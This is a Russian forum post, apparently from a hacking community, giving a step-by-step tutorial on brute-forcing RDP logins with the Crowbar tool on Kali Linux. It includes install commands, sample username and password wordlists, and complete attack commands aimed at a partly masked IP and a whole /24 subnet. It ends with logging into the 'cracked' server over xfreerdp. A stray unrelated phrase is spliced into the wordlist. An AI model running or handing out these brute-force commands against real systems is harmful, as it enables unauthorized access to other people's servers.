Я не знаю, потянет ли данная статья на участие в конкурсе, поэтому решение об её участии оставляю за администрацией форума .
Я не планировала писать эту статью.
Её написание пришло спонтанно и фактически явилось "побочным эффектом" от более тесного знакомства со скриптом для брутфорса "Patator".
Так уж сложились обстоятельства, что я не люблю заниматься хакингом на локальной машине. Для этих целей у меня всегда имеется виртуальный выделенный сервер. Обычно мои VDS управляются либо Windows, либо CentOS.
Вчера упрямый Patator не пожелал "прогнуться" под мои желания и Господин Случай сделал для меня маленькое открытие ))
В этом месте читателю в голову пришли мысли о том, что Илон Маск уже колонизировал Марс )
Нет, мои открытия намного скромнее. Оказалось, что для семейства Линукс написан очередной скрипт для осуществления атак "грубой силой" на Python.
Встречайте, Его Величество Crowbar.
Первоначально у меня было намерение установить скрипт на удалённую машину под управлением CentOS 7. Но меня ожидала неудача. Дело в том, что я планировала проверить работу скрипта по протоколу RDP и никакие компромиссы меня не устраивали. При работе по протоколу удалённого рабочего стола работа скрипта тесно связана с утилитой xfreerdp.
Я подключалась к VDS как обычно по протоколу SSH - в этом заключалась моя вероятная ошибка.
Для успешного контакта Crowbar+ XfreeRDP на удалённой машине необходимо было подключиться по VNC либо RDP.
Но внезапно нахлынувший ночной энтузиазм таял от минуты к минуте и было принято решение сдуть пыль с ярлыка "VMware Workstation Pro" на рабочем столе локальной машины.
На установку скачанного десять месяцев назад образа KaliLinux не ушло много времени.
По-быстрому произведены первичные настройки виртуального Kali и настал момент "танцев с бубном" вокруг Crowbar.
Код:
# apt-get update
Код:
# apt-get install freerdp-x11
Проверка работоспособности xfreerdp
Код:
# xfreerdp --version
# xfreerdp --sec nla 185.154.13.84
Клонируем скрипт Crowbar при помощи git:
Код:
# git clone https://github.com/galkan/crowbar
Код:
# cd crowbar
Код:
# chmod +x crowbar.py
Код:
# python crowbar.py --help
Перед моим взором на экране монитора появилась страница справки по программе.
В этом месте возможно появление следующей ошибки:
No module named pkg_resources
Решение проблемы с ошибкой No module named pkg_resources
ИлиКод:# yum -y update # yum -y install python-pip # pip install --upgrade pip
Опять пробуем запустить "Хелп"Код:# pip install --upgrade setuptools # pip install --upgrade distribute
Работает ))Код:# python crowbar.py --help
На этом - ВСЁ.
Всё коротко и лаконично )
Создаём текстовые файлы с предполагаемым списком логинов
а также со списком предполагаемых паролей:Администратор
Administrator
admin
nimda
Запуск скрипта питон в скрипте башadmin
root
123456
12345
123456789
password
iloveyou
princess
1234567
rockyou
12345678
abc123
Атаковать будем мой тестовый дедик IP 185.1хх.13.хх
Команда для атаки в моём случае должна иметь следующий вид:
Код:
# python crowbar.py -b rdp -U login.txt -C pass.txt -s IP 185.1хх.13.хх/32 -o good.txt -n 100 -t 500 -v -d
Код:
# python crowbar.py -b rdp -U login.txt -C pass.txt -s 185.1хх.13.хх/24 -o good.txt -n 100 -t 500 -v -d
После окончания атаки просматриваем файл good.txt и обнаруживает, что тестовый дедик успешно сбручен.-b rdp - Целевая служба. Crowbar поддерживает vnckey, openvpn, sshkey, rdp.
-n 100 - Количество задействованных потоков
-S: </path/to/file> список IP для брута
-d: Запустить nmap для того, чтобы узнать, является ли порт открытым или нет.
-v: Подробный режим, который показывает все попытки, включая неудачу.
-o good.txt -Все логи включая положительные результаты записываются в файл good.txt
Подключаемся к его удалённому рабочему столу.
Код:
# xfreerdp -k en-us -a 32 -x l -z -u Administrator -g 800x600 --sec rdp --plugin cliprdr 185.1хх.13.хх
Успех )
В заключении статьи предлагаю к просмотру небольшой видеообзор скрипта
На этом у меня всё.
Всем - спасибо )
Последнее редактирование модератором: